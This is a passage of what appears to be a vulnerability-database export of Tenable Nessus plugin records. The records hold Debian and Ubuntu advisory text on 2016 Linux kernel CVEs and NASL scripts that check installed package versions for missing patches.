prefix:\"linux-headers-3.16.0-9-armmp\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-armmp-lpae\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-common\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-ixp4xx\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-kirkwood\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-orion5x\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-3.16.0-9-versatile\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-586\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-686-pae\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-686-pae-dbg\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-amd64\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-amd64-dbg\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-armmp\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-armmp-lpae\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-ixp4xx\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-kirkwood\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-orion5x\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-3.16.0-9-versatile\", 
reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-libc-dev\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-manual-3.16\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-source-3.16\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-support-3.16.0-9\", reference:\"3.16.36-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"xen-linux-system-3.16.0-9-amd64\", reference:\"3.16.36-1+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-03-01T07:31:25", "description": "Marco Grassi discovered a use-after-free condition could occur in the\nTCP retransmit queue handling code in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the audit subsystem in the\nLinux kernel. A local attacker could use this to corrupt audit logs or\ndisrupt system-call auditing. (CVE-2016-6136)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID\ncontroller driver in the Linux kernel when handling ioctl()s. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2016-6480).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 35, "cvss3": {"score": 5.5, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-10-11T00:00:00", "title": "Ubuntu 12.04 LTS : linux vulnerabilities (USN-3097-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-6136", "CVE-2016-6828"], "modified": "2021-03-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-virtual", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic-pae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-highbank", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-3097-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93953", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3097-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93953);\n script_version(\"2.14\");\n script_cvs_date(\"Date: 2019/09/18 12:31:46\");\n\n script_cve_id(\"CVE-2016-6136\", \"CVE-2016-6480\", \"CVE-2016-6828\");\n script_xref(name:\"USN\", value:\"3097-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux vulnerabilities (USN-3097-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Marco Grassi discovered a use-after-free condition could occur in the\nTCP retransmit queue handling code in the Linux kernel. 
A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the audit subsystem in the\nLinux kernel. A local attacker could use this to corrupt audit logs or\ndisrupt system-call auditing. (CVE-2016-6136)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID\ncontroller driver in the Linux kernel when handling ioctl()s. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2016-6480).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3097-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-highbank\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-virtual\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-6136\", \"CVE-2016-6480\", \"CVE-2016-6828\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3097-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-111-generic\", pkgver:\"3.2.0-111.153\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-111-generic-pae\", pkgver:\"3.2.0-111.153\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-111-highbank\", pkgver:\"3.2.0-111.153\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-111-virtual\", pkgver:\"3.2.0-111.153\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.2-generic / linux-image-3.2-generic-pae / etc\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-03-01T07:31:25", "description": "Vladimir Benes discovered an unbounded recursion in the VLAN and TEB\nGeneric Receive Offload (GRO) processing implementations in the Linux\nkernel, A remote attacker could use this to cause a stack corruption,\nleading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the\nTCP retransmit queue handling code in the Linux kernel. 
A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the audit subsystem in the\nLinux kernel. A local attacker could use this to corrupt audit logs or\ndisrupt system-call auditing. (CVE-2016-6136)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID\ncontroller driver in the Linux kernel when handling ioctl()s. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2016-6480).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 36, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-10-11T00:00:00", "title": "Ubuntu 14.04 LTS : linux vulnerabilities (USN-3098-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-6136", "CVE-2016-6828", "CVE-2016-7039"], "modified": "2021-03-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-3098-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93954", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3098-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93954);\n script_version(\"2.14\");\n script_cvs_date(\"Date: 2019/09/18 12:31:46\");\n\n script_cve_id(\"CVE-2016-6136\", \"CVE-2016-6480\", \"CVE-2016-6828\", \"CVE-2016-7039\");\n script_xref(name:\"USN\", value:\"3098-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux vulnerabilities (USN-3098-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vladimir Benes discovered an unbounded recursion in the VLAN and TEB\nGeneric Receive Offload (GRO) processing implementations in the Linux\nkernel, A remote attacker could use this to cause a stack corruption,\nleading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the\nTCP retransmit queue handling code in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the audit subsystem in the\nLinux kernel. A local attacker could use this to corrupt audit logs or\ndisrupt system-call auditing. (CVE-2016-6136)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID\ncontroller driver in the Linux kernel when handling ioctl()s. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2016-6480).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3098-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.13-generic,\nlinux-image-3.13-generic-lpae and / or linux-image-3.13-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-6136\", \"CVE-2016-6480\", \"CVE-2016-6828\", \"CVE-2016-7039\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3098-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-98-generic\", pkgver:\"3.13.0-98.145\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-98-generic-lpae\", pkgver:\"3.13.0-98.145\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-98-lowlatency\", pkgver:\"3.13.0-98.145\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 
\"linux-image-3.13-generic / linux-image-3.13-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-03-01T07:31:25", "description": "USN-3098-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu\n12.04 LTS.\n\nMarco Grassi discovered a use-after-free condition could occur in the\nTCP retransmit queue handling code in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2016-6828)\n\nVladimir Benes discovered an unbounded recursion in the VLAN and TEB\nGeneric Receive Offload (GRO) processing implementations in the Linux\nkernel, A remote attacker could use this to cause a stack corruption,\nleading to a denial of service (system crash). (CVE-2016-7039)\n\nPengfei Wang discovered a race condition in the audit subsystem in the\nLinux kernel. A local attacker could use this to corrupt audit logs or\ndisrupt system-call auditing. (CVE-2016-6136)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID\ncontroller driver in the Linux kernel when handling ioctl()s. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2016-6480).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 36, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-10-11T00:00:00", "title": "Ubuntu 12.04 LTS : linux-lts-trusty vulnerabilities (USN-3098-2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-6136", "CVE-2016-6828", "CVE-2016-7039"], "modified": "2021-03-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-3098-2.NASL", "href": "https://www.tenable.com/plugins/nessus/93955", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3098-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93955);\n script_version(\"2.14\");\n script_cvs_date(\"Date: 2019/09/18 12:31:46\");\n\n script_cve_id(\"CVE-2016-6136\", \"CVE-2016-6480\", \"CVE-2016-6828\", \"CVE-2016-7039\");\n script_xref(name:\"USN\", value:\"3098-2\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux-lts-trusty vulnerabilities (USN-3098-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-3098-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04\nLTS. 
This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu\n12.04 LTS.\n\nMarco Grassi discovered a use-after-free condition could occur in the\nTCP retransmit queue handling code in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2016-6828)\n\nVladimir Benes discovered an unbounded recursion in the VLAN and TEB\nGeneric Receive Offload (GRO) processing implementations in the Linux\nkernel, A remote attacker could use this to cause a stack corruption,\nleading to a denial of service (system crash). (CVE-2016-7039)\n\nPengfei Wang discovered a race condition in the audit subsystem in the\nLinux kernel. A local attacker could use this to corrupt audit logs or\ndisrupt system-call auditing. (CVE-2016-6136)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID\ncontroller driver in the Linux kernel when handling ioctl()s. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2016-6480).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3098-2/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.13-generic and / or\nlinux-image-3.13-generic-lpae packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-6136\", \"CVE-2016-6480\", \"CVE-2016-6828\", \"CVE-2016-7039\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3098-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.13.0-98-generic\", pkgver:\"3.13.0-98.145~precise1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.13.0-98-generic-lpae\", pkgver:\"3.13.0-98.145~precise1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.13-generic / linux-image-3.13-generic-lpae\");\n}\n", "cvss": {"score": 7.8, "vector": 
"AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-12T09:43:57", "description": "This update fixes the CVEs described below.\n\nCVE-2016-3857\n\nChiachih Wu reported two bugs in the ARM OABI compatibility layer that\ncan be used by local users for privilege escalation. The OABI\ncompatibility layer is enabled in all kernel flavours for armel and\narmhf.\n\nCVE-2016-4470\n\nWade Mealing of the Red Hat Product Security Team reported that in\nsome error cases the KEYS subsystem will dereference an uninitialised\npointer. A local user can use the keyctl() system call for denial of\nservice (crash) or possibly for privilege escalation.\n\nCVE-2016-5696\n\nYue Cao, Zhiyun Qian, Zhongjie Wang, Tuan Dao, and Srikanth V.\nKrishnamurthy of the University of California, Riverside; and Lisa M.\nMarvel of the United States Army Research Laboratory discovered that\nLinux's implementation of the TCP Challenge ACK feature results in a\nside channel that can be used to find TCP connections between specific\nIP addresses, and to inject messages into those connections.\n\nWhere a service is made available through TCP, this may\nallow remote attackers to impersonate another connected user\nto the server or to impersonate the server to another\nconnected user. In case the service uses a protocol with\nmessage authentication (e.g. TLS or SSH), this vulnerability\nonly allows denial of service (connection failure). 
An\nattack takes tens of seconds, so short-lived TCP connections\nare also unlikely to be vulnerable.\n\nThis may be mitigated by increasing the rate limit for TCP\nChallenge ACKs so that it is never exceeded: sysctl\nnet.ipv4.tcp_challenge_ack_limit=1000000000\n\nCVE-2016-5829\n\nSeveral heap-based buffer overflow vulnerabilities were found in the\nhiddev driver, allowing a local user with access to a HID device to\ncause a denial of service or potentially escalate their privileges.\n\nCVE-2016-6136\n\nPengfei Wang discovered that the audit subsystem has a 'double-fetch'\nor 'TOCTTOU' bug in its handling of special characters in the name of\nan executable. Where audit logging of execve() is enabled, this allows\na local user to generate misleading log messages.\n\nCVE-2016-6480\n\nPengfei Wang discovered that the aacraid driver for Adaptec RAID\ncontrollers has a 'double-fetch' or 'TOCTTOU' bug in its validation of\n'FIB' messages passed through the ioctl() system call. This has no\npractical security impact in current Debian releases.\n\nCVE-2016-6828\n\nMarco Grassi reported a 'use-after-free' bug in the TCP\nimplementation, which can be triggered by local users. The security\nimpact is 